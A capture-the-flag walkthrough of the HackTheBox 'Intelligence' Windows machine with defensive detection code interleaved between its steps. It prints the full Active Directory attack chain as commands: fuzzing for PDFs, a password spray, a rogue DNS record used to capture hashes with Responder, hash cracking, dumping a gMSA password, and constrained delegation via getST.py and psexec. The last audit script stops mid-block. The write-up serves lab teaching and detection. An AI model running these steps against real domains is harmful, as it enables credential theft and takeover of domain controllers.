In this walkthrough, we will be going through the Intelligence room from HackTheBox. This room is rated Medium on the platform and it consists of password spraying with credentials captured from an internal PDF document. For privilege escalation, the right to read a group managed service account's password is abused to perform a constrained delegation attack, which is used to access the DC and get root. So, let’s get started without any delay.
Machine Info:
| Title | Intelligence |
| --- | --- |
| IP address | 10.10.10.248 |
| Difficulty | Medium |
| OS | Windows |
| Description | Intelligence is a medium difficulty Windows machine in which we get an initial foothold on the target by leveraging credentials found in internal PDF documents. For privilege escalation, a scheduled PowerShell script was abused to get the hash of a second user. This user is allowed to read the password of a group managed service account, which in turn has constrained delegation access to the DC. |
Enumeration:
- I started off with a regular nmap scan with aggressive detection (-A) and found multiple open ports, as expected from a Windows machine. The key ports identified were 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB) and 389/636 (LDAP/LDAPS).
$ sudo nmap -A 10.10.10.248
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 23:00 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54402 > 10.10.10.248:53 S ttl=50 id=14929 iplen=44 seq=1595588214 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54403 > 10.10.10.248:53 S ttl=47 id=31369 iplen=44 seq=1595653751 win=1024 <mss 1460>
Nmap scan report for 10.10.10.248
Host is up (0.18s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-15 01:30:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-12-15T01:31:30
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   181.16 ms 10.10.14.1
2   182.50 ms 10.10.10.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.77 seconds
- I also performed a full port scan and found a bunch more ports. One that may be useful was 5985 (WinRM).
sudo nmap -sS -p- -T5 10.10.10.248
- Added the host names to my /etc/hosts file.
- Tried to enumerate some usernames using RPC and LDAP but found nothing.
- Next, enumerated the web server running on port 80 and found a static website running.
- One thing that caught my attention was the PDF document files in the Announcement Document section.
- Found some sample text inside it. Nothing useful.
- Fired up gobuster against the server to reveal some juicy directories. Found only one hit at /documents, which we cannot access directly.
gobuster dir -u http://intelligence.htb/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
- Going back to the PDF files, I looked at the URL carefully and it seems the PDF files are uploaded by date and named after it too. I changed the date in the URL and got a hit. That means we can fuzz the application for the available PDF files.
http://intelligence.htb/documents/2020-01-02-upload.pdf
- Generated a list of dates for the year 2020.
Fuzzing the application for PDF files
- Next, used ffuf to fuzz the application for the PDF files and got a lot of hits.
$ ffuf -u http://intelligence.htb/documents/FUZZ-upload.pdf -w dates.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://intelligence.htb/documents/FUZZ-upload.pdf
 :: Wordlist         : FUZZ: /home/wh1terose/CTF/HTB/machines/Intelligence/dates.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

2020-01-22              [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 907ms]
2020-01-02              [Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 179ms]
-- snipped --
2020-12-30              [Status: 200, Size: 25109, Words: 218, Lines: 191, Duration: 179ms]
:: Progress: [366/366] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
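From the defender's side, this fuzzing run shows up in the IIS logs as one client requesting dozens of distinct file names in a single directory within a few seconds, most of them answered with 404. The detector below is an added example (not from the walkthrough) that runs over constructed IIS W3C log lines: the field layout is the IIS default, the requests and the client addresses are made up.

```python
"""Spot date-based filename enumeration against a static document folder.

Added example, not part of the walkthrough. Parses IIS W3C log lines and flags
a client that hits one directory with many distinct file names in a short
window, most of which do not exist. The log is constructed below.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import posixpath


def _sample_log():
    """Construct a small IIS log: one fuzzing client, one ordinary visitor."""
    header = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
              "cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus "
              "sc-win32-status time-taken")
    start = datetime(2023, 12, 15, 1, 40, 0)
    lines = [header]
    for i in range(1, 31):                       # 30 guesses, about 10 per second
        when = (start + timedelta(seconds=i // 10)).strftime("%Y-%m-%d %H:%M:%S")
        status = 200 if i in (2, 22) else 404    # only two guessed names exist
        lines.append(f"{when} 10.10.10.248 GET /documents/2020-01-{i:02d}-upload.pdf - 80 - "
                     f"10.10.14.24 curl/8.0 - {status} 0 {2 if status == 404 else 0} 3")
    lines.append("2023-12-15 01:40:10 10.10.10.248 GET /index.html - 80 - 10.10.10.50 "
                 "Mozilla/5.0 - 200 0 0 4")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = _sample_log()   # constructed data


def parse_iis_log(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        yield dict(zip(fields, line.split()))


def detect_enumeration(log_text, min_requests=20, window=timedelta(seconds=60),
                       min_404_ratio=0.5):
    """Return {(client_ip, directory): stats} for clients that look like fuzzers."""
    buckets = defaultdict(list)
    for r in parse_iis_log(log_text):
        when = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        directory = posixpath.dirname(r["cs-uri-stem"])
        buckets[(r["c-ip"], directory)].append((when, r["cs-uri-stem"], r["sc-status"]))

    alerts = {}
    for key, reqs in buckets.items():
        reqs.sort()
        names = {stem for _, stem, _ in reqs}
        not_found = sum(1 for _, _, st in reqs if st == "404")
        span = reqs[-1][0] - reqs[0][0]
        # Many distinct names, mostly missing, inside a short window: enumeration.
        if (len(reqs) >= min_requests and len(names) >= min_requests
                and span <= window and not_found / len(reqs) >= min_404_ratio):
            alerts[key] = {
                "requests": len(reqs),
                "not_found": not_found,
                "span_seconds": int(span.total_seconds()),
                # Guesses that succeeded are the files now known to be exposed.
                "found": sorted(posixpath.basename(stem) for _, stem, st in reqs if st == "200"),
            }
    return alerts


if __name__ == "__main__":
    for (ip, directory), stats in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip} enumerated {directory}: {stats}")
```

The "found" list is the useful output for response: it tells you which documents the client confirmed, so you know what was exposed. The real fix is on the server side, namely not publishing guessable names and requiring authentication for the directory.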
- Found a message regarding an Internal IT Update which talks about a script developed by user Ted to notify the teams of any outages or attacks.
http://intelligence.htb/documents/2020-12-30-upload.pdf
- Meanwhile, I also tried to enumerate some shares using smbclient but found nothing.
- I downloaded the file containing the note to my local machine.
wget http://intelligence.htb/documents/2020-12-30-upload.pdf
- Looked inside its metadata and found the Creator name – Jason.Patterson.
exiftool 2020-12-30-upload.pdf
- I generated a list of dates again, this time including both 2020 and 2021, and got many successful hits. Next, we have to download them in order to get at least some potential usernames.
- Used the below commands to build the URLs as per our requirement.
cut -d " " -f 1 files.txt > final.txt
head final.txt
sed -e 's/$/-upload.pdf/' -i final.txt
awk '$0="http://intelligence.htb/documents/"$0' final.txt > pdflist.txt
- Downloaded all the PDF files to my local machine using wget.
wget -i pdflist.txt
- Found a default account password in one of the PDF files – NewIntelligenceCorpUser9876.
- Next, I used Metaforge to extract all the metadata from the PDF files and save it in one location.
python3 ~/Tools/Metaforge/metaforge.py
- Used the below Linux-fu to get the usernames from all the captured metadata.
grep Creator *-upload.pdf.json | cut -d ":" -f 4 | tr "," " " | tr -d '"' > usernames.txt
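The usernames came straight out of the PDFs' Creator field, so the cheapest fix is on the publishing side: check the metadata before a document goes onto the web server. The scanner below is an added example and not part of the walkthrough. It reads the Info dictionary directly from the PDF bytes, which covers the common uncompressed case (PDFs whose metadata sits in compressed object streams or XMP need a real parser such as pypdf), and the sample PDF is constructed inline with the page's own Creator value plus a second, UTF-16-encoded Author entry.

```python
"""Pre-publication check for leaked author metadata in PDF files.

Added example, not from the walkthrough. Scans a PDF's Info dictionary for
/Author, /Creator, /Producer and similar values that look like domain logon
names (first.last). Operates on the raw bytes of an uncompressed Info
dictionary, which is how most office suites write it.
"""
import re
import sys

# Keys that commonly carry a person's or an account's name.
IDENTITY_KEYS = ("Author", "Creator", "Producer", "LastModifiedBy")
_KEY_ALT = b"|".join(k.encode() for k in IDENTITY_KEYS)

# /Key followed by a literal string "(...)" or a hex string "<...>".
_ENTRY = re.compile(
    rb"/(?P<key>" + _KEY_ALT + rb")\s*"
    rb"(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)"
)

# Anything shaped like a domain logon name: first.last or first.last@domain.
_USERNAME_SHAPE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+(@[\w.-]+)?$")

# Constructed sample: a minimal PDF whose Info dictionary carries two usernames.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Creator (Jason.Patterson) /Producer (Microsoft: Print To PDF)\n"
    b"   /Author <FEFF00540069006600660061006E0079002E004D006F006C0069006E0061> >> endobj\n"
    b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
)


def _decode(match):
    """Turn a matched PDF string (literal or hex) into text."""
    if match.group("lit") is not None:
        raw = re.sub(rb"\\([()\\])", rb"\1", match.group("lit"))   # unescape \( \) \\
        return raw.decode("latin-1")
    data = bytes.fromhex(re.sub(rb"\s", b"", match.group("hex")).decode())
    if data.startswith(b"\xfe\xff"):                                 # UTF-16BE with BOM
        return data[2:].decode("utf-16-be")
    return data.decode("latin-1")


def extract_identity_metadata(pdf_bytes):
    """Return {key: value} for every identity-bearing Info entry in the PDF."""
    return {m.group("key").decode(): _decode(m) for m in _ENTRY.finditer(pdf_bytes)}


def find_username_leaks(pdf_bytes):
    """Return only the metadata values that look like domain usernames."""
    return {k: v for k, v in extract_identity_metadata(pdf_bytes).items()
            if _USERNAME_SHAPE.match(v.strip())}


if __name__ == "__main__":
    # Usage: python3 pdf_meta_check.py file1.pdf file2.pdf ...  (exit 1 if any leak)
    leaked = False
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            leaks = find_username_leaks(fh.read())
        print(f"{path}: {leaks or 'clean'}")
        leaked |= bool(leaks)
    sys.exit(1 if leaked else 0)
```

Run it as a gate in whatever pipeline publishes the documents; a non-zero exit blocks the upload until the metadata is stripped.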
- Performed a password spray against the usernames list we generated with the default password. Got a hit for Tiffany.Molina.
$ crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] STATUS_LOGON_FAILURE
-- snipped --
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Tiffany.Molina: NewIntelligenceCorpUser9876
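What this spray looks like from the DC's side: one source address producing a burst of 4625 logon failures for many different accounts within a short time, then a 4624 success. The detector below is an added example, not from the walkthrough; the event lines are constructed in a flattened key=value form such as a SIEM export might produce, with the real Security-log field names and status codes (SubStatus 0xC000006A is a wrong password, 0xC0000064 an unknown user).

```python
"""Detect a password spray in Windows logon events.

Added example, not from the walkthrough. A spray is one source producing 4625
failures for many *distinct* accounts in a short window, usually followed by a
4624 success when the default password matches. Events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events, one per line. Names ending in ".Sample" are made up.
SAMPLE_EVENTS = """\
2023-12-14T23:10:01Z EventID=4625 TargetUserName=William.Lee IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:01Z EventID=4625 TargetUserName=Jason.Patterson IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:02Z EventID=4625 TargetUserName=Alex.Sample IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:02Z EventID=4625 TargetUserName=Casey.Sample IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:02Z EventID=4625 TargetUserName=Drew.Sample IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:03Z EventID=4625 TargetUserName=Jordan.Sample IpAddress=10.10.14.24 SubStatus=0xC000006A
2023-12-14T23:10:03Z EventID=4624 TargetUserName=Tiffany.Molina IpAddress=10.10.14.24 LogonType=3
2023-12-14T23:15:00Z EventID=4625 TargetUserName=Ted.Graves IpAddress=10.10.10.50 SubStatus=0xC000006A
2023-12-14T23:15:30Z EventID=4625 TargetUserName=Ted.Graves IpAddress=10.10.10.50 SubStatus=0xC000006A
"""


def parse_event(line):
    """'<ISO time> key=value key=value ...' -> dict with a parsed 'time'."""
    stamp, *pairs = line.split()
    event = {"time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")}
    for pair in pairs:
        key, _, value = pair.partition("=")
        event[key] = value
    return event


def detect_password_spray(text, min_distinct_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: details} for sources whose failures look like a spray."""
    by_ip = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            ev = parse_event(line)
            by_ip[ev["IpAddress"]].append(ev)

    alerts = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["time"])
        failures = [e for e in events if e["EventID"] == "4625"]
        best, start = None, 0
        for end in range(len(failures)):                  # sliding time window
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            users = {e["TargetUserName"].lower() for e in failures[start:end + 1]}
            if len(users) >= min_distinct_users and (best is None or len(users) > best[2]):
                best = (failures[start]["time"], failures[end]["time"], len(users))
        if best is None:
            continue                                       # normal failed logons only
        first, last, count = best
        # A success from the same source during or right after the burst: the spray hit.
        hits = sorted({e["TargetUserName"] for e in events
                       if e["EventID"] == "4624" and first <= e["time"] <= last + window})
        alerts[ip] = {"first": first, "last": last,
                      "distinct_users": count, "successful_logons": hits}
    return alerts


if __name__ == "__main__":
    for ip, details in detect_password_spray(SAMPLE_EVENTS).items():
        print(ip, details)
```

The two failures from 10.10.10.50 are one user mistyping a password and are not flagged; the per-user lockout counter sees those, while the spray deliberately stays under it by trying each account once. Counting distinct accounts per source is what makes the spray visible.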
- Tried to get shell access as user Tiffany.Molina but was denied.
Initial Access:
- Next, checked the SMB permissions for the user and found an interesting share – Users.
smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
- Got access to the Users share and captured the user flag.
$ smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 06:50:26 2021
  ..                                 DR        0  Mon Apr 19 06:50:26 2021
  Administrator                       D        0  Mon Apr 19 05:48:39 2021
  All Users                       DHSrn        0  Sat Sep 15 12:51:46 2018
  Default                           DHR        0  Mon Apr 19 07:47:40 2021
  Default User                    DHSrn        0  Sat Sep 15 12:51:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 12:41:27 2018
  Public                             DR        0  Mon Apr 19 05:48:39 2021
  Ted.Graves                          D        0  Mon Apr 19 06:50:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 06:21:46 2021

                3770367 blocks of size 4096. 1405400 blocks available
smb: \> cd Tiffany.Molina\
smb: \Tiffany.Molina\> ls
  .                                   D        0  Mon Apr 19 06:21:46 2021
  ..                                  D        0  Mon Apr 19 06:21:46 2021
  AppData                            DH        0  Mon Apr 19 06:21:46 2021
  Application Data                DHSrn        0  Mon Apr 19 06:21:46 2021
  Cookies                         DHSrn        0  Mon Apr 19 06:21:46 2021
  Desktop                            DR        0  Mon Apr 19 06:21:46 2021
  Documents                          DR        0  Mon Apr 19 06:21:46 2021
  Downloads                          DR        0  Sat Sep 15 12:42:33 2018
  Favorites                          DR        0  Sat Sep 15 12:42:33 2018
  Links                              DR        0  Sat Sep 15 12:42:33 2018
  Local Settings                  DHSrn        0  Mon Apr 19 06:21:46 2021
  Music                              DR        0  Sat Sep 15 12:42:33 2018
  My Documents                    DHSrn        0  Mon Apr 19 06:21:46 2021
  NetHood                         DHSrn        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT                        AHn   131072  Thu Dec 14 15:19:09 2023
  ntuser.dat.LOG1                   AHS    86016  Mon Apr 19 06:21:46 2021
  ntuser.dat.LOG2                   AHS        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf      AHS    65536  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms      AHS   524288  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms      AHS   524288  Mon Apr 19 06:21:46 2021
  ntuser.ini                        AHS       20  Mon Apr 19 06:21:46 2021
  Pictures                           DR        0  Sat Sep 15 12:42:33 2018
  Recent                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Saved Games                         D        0  Sat Sep 15 12:42:33 2018
  SendTo                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Start Menu                      DHSrn        0  Mon Apr 19 06:21:46 2021
  Templates                       DHSrn        0  Mon Apr 19 06:21:46 2021
  Videos                             DR        0  Sat Sep 15 12:42:33 2018

                3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Mon Apr 19 06:21:46 2021
  ..                                 DR        0  Mon Apr 19 06:21:46 2021
  user.txt                           AR       34  Thu Dec 14 15:09:41 2023

                3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> exit
- Another interesting share that held yet another interesting file was IT. Got access inside it and downloaded the PowerShell script named downdetector.ps1.
smbclient //10.10.10.248/IT --user Tiffany.Molina --password NewIntelligenceCorpUser9876 get downdetector.ps1
- Looked inside the downdetector script and found that it is the same script that user Ted has set up as per the note. The script checks for any DNS records starting with "web" and then uses Ted's credentials (via -UseDefaultCredentials) to send an email to Ted notifying him of the potential attack.
cat downdetector.ps1
Lateral Movement:
- We can take advantage of this and capture user Ted’s NTLM hash via Responder. For that, we have to set up a fake DNS record whose name starts with “Web” and which resolves to our Responder listener IP. Once the script checks the newly configured DNS record, it will send an alert using Ted’s creds, and at that moment we will be able to capture the hash. I used dnstool to add a DNS record.
python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webfake --data 10.10.14.17 10.10.10.248
- Set up Responder for the attack. Within 5 minutes, I was blessed with the NTLMv2 hash of user Ted.Graves.
sudo responder -I tun0 -v
Ted.Graves::intelligence:b1cfe264a50ed5c -- snipped --
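The root cause on the defending side is a script that trusts whatever DNS returns. AD-integrated DNS lets any authenticated domain user create records by default, so a scheduled job that discovers "web*" hosts from the zone and contacts them with -UseDefaultCredentials will authenticate to anything someone registers. Two controls that close this are a zone baseline (so a new "web" record is noticed before the job runs) and a static allowlist of hosts the job may ever send credentials to, checked against trusted address ranges. The following is an added example, not the page's downdetector.ps1 (whose contents are not shown); the record data, networks and allowlist are all constructed.

```python
"""Guard a monitoring job against attacker-planted DNS records.

Added example, not from the walkthrough. Models two controls on constructed
data: diff the zone against a known baseline, and only allow default
credentials toward allowlisted hosts that still resolve into trusted ranges.
"""
import ipaddress

# Constructed: the zone's A records at the last review.
BASELINE_RECORDS = {"dc": "10.10.10.248", "web01": "10.10.10.30"}
# Constructed: the zone now, after someone added "webfake" pointing off-site.
CURRENT_RECORDS = {"dc": "10.10.10.248", "web01": "10.10.10.30", "webfake": "10.10.14.17"}
TRUSTED_NETWORKS = [ipaddress.ip_network("10.10.10.0/24")]      # constructed
ALLOWED_WEB_HOSTS = {"web01"}                                   # constructed allowlist


def changed_records(baseline, current):
    """Records that are new, or now resolve somewhere other than the baseline says."""
    return {name: addr for name, addr in current.items() if baseline.get(name) != addr}


def in_trusted_network(addr, networks=TRUSTED_NETWORKS):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in networks)


def suspicious_web_records(records, prefix="web"):
    """'web*' names resolving outside trusted ranges: exactly what a hash-capture
    listener would need, so they deserve a ticket before the job runs."""
    return {name: addr for name, addr in records.items()
            if name.lower().startswith(prefix) and not in_trusted_network(addr)}


def credentialed_targets(records, allowlist=ALLOWED_WEB_HOSTS):
    """The only hosts the job may contact with default credentials: named on the
    static allowlist AND still resolving to a trusted address. Discovery from
    DNS alone never qualifies a host."""
    return sorted(name for name, addr in records.items()
                  if name in allowlist and in_trusted_network(addr))


def review(baseline, current):
    """One-shot report a scheduled pre-check could emit before the job runs."""
    return {"changed": changed_records(baseline, current),
            "suspicious": suspicious_web_records(current),
            "safe_targets": credentialed_targets(current)}


if __name__ == "__main__":
    print(review(BASELINE_RECORDS, CURRENT_RECORDS))
```

The allowlist check also covers the case where an existing, legitimate name is repointed: a hijacked web01 resolving outside the trusted range simply drops out of the targets. Tightening who may create records in the zone (the ADIDNS ACL) removes the problem at its source.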
- Cracked the hash using hashcat and got the password.
sudo hashcat -m 5600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -O
TED.GRAVES: Mr.Teddy
- Next, using the found credentials, I used bloodhound-python to retrieve information from the domain.
$ bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -gc intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: intelligence.htb
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 53S
- Uploaded the data to BloodHound and looked for the “Shortest Path to Domain Admins”. The path shows that once we get access to user SVC_INT, we will be allowed to delegate to the DC. We can reach SVC_INT from our currently owned user via the ITSUPPORT group, as it has the ReadGMSAPassword permission on it.
- I looked into the help for this edge and learned that we can abuse it using the gMSADumper tool.
- I used the same and dumped the hash for user svc_backup.
python3 ~/Tools/gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d4a0554f26a9f3df13720481e07e0a3f
Privilege Escalation:
- Next, I performed a constrained delegation attack from svc_backup against the DC to impersonate Administrator and get a TGT for it.
sudo ntpdate 10.10.10.248
getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :d4a0554f26a9f3df13720481e07e0a3f -impersonate administrator intelligence.htb/svc_int
export KRB5CCNAME=administrator.ccache
- Used the dumped TGT to get shell access on the target using psexec as Administrator.
psexec.py -k -no-pass dc.intelligence.htb
- Finally, captured the root flag and completed the room.
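The chain BloodHound surfaced (ITSUPPORT can read svc_int's gMSA password, svc_int may delegate to the DC, and Administrator can be impersonated) is something a periodic audit can flag before anyone walks it. The audit below is an added example, not from the page or from any tool it uses. It evaluates constructed, pre-exported account objects: the attribute names and userAccountControl bit values are the real ones, but msDS-GroupMSAMembership is really a security descriptor and is shown here already resolved to principal names.

```python
"""Audit the gMSA-to-delegation chain this box is built around.

Added example, not from the walkthrough. Flags three conditions on exported
account objects (constructed below): user groups allowed to read a gMSA
password, constrained delegation targeting a domain controller, and
privileged accounts that are still allowed to be delegated.
"""
# userAccountControl bits (real values).
TRUSTED_FOR_DELEGATION = 0x80000
NOT_DELEGATED = 0x100000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

DC_HOSTS = {"dc.intelligence.htb"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed export of the relevant objects. msDS-GroupMSAMembership is a
# security descriptor in AD; here it is pre-resolved to principal names.
OBJECTS = [
    {"sAMAccountName": "svc_int$", "objectClass": "msDS-GroupManagedServiceAccount",
     "msDS-GroupMSAMembership": ["itsupport", "DC$"],
     "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"],
     "userAccountControl": 0x1000},                       # WORKSTATION_TRUST_ACCOUNT
    {"sAMAccountName": "Administrator", "memberOf": ["Domain Admins", "Administrators"],
     "userAccountControl": 0x200},                        # NORMAL_ACCOUNT, delegatable
    {"sAMAccountName": "Ted.Graves", "memberOf": ["itsupport"], "userAccountControl": 0x200},
    {"sAMAccountName": "DC$", "userAccountControl": 0x2000 | TRUSTED_FOR_DELEGATION},
]


def _spn_host(spn):
    """'class/host[:port][/name]' -> host, lower-cased."""
    return spn.split("/", 1)[1].split("/")[0].split(":")[0].lower()


def audit(objects, dc_hosts=DC_HOSTS, gmsa_readers_allowed=frozenset({"DC$"})):
    """Return a list of (finding, account, detail) tuples."""
    findings = []
    for o in objects:
        name = o["sAMAccountName"]
        uac = o.get("userAccountControl", 0)
        groups = set(o.get("memberOf", []))

        # 1. Only the computer(s) running the service should read a gMSA password.
        if o.get("objectClass") == "msDS-GroupManagedServiceAccount":
            for principal in o.get("msDS-GroupMSAMembership", []):
                if principal not in gmsa_readers_allowed:
                    findings.append(("GMSA_PASSWORD_READABLE_BY", name, principal))

        # 2. Constrained delegation to a DC service is DC access for whoever owns the account.
        for spn in o.get("msDS-AllowedToDelegateTo", []):
            if _spn_host(spn) in dc_hosts:
                kind = ("CONSTRAINED_DELEGATION_TO_DC_WITH_PROTOCOL_TRANSITION"
                        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION
                        else "CONSTRAINED_DELEGATION_TO_DC")
                findings.append((kind, name, spn))

        # 3. Privileged accounts should be "sensitive and cannot be delegated" or in
        #    Protected Users; otherwise a delegating account can impersonate them.
        if (groups & PRIVILEGED_GROUPS and "Protected Users" not in groups
                and not uac & NOT_DELEGATED):
            findings.append(("PRIVILEGED_ACCOUNT_DELEGATABLE", name, ""))
    return findings


if __name__ == "__main__":
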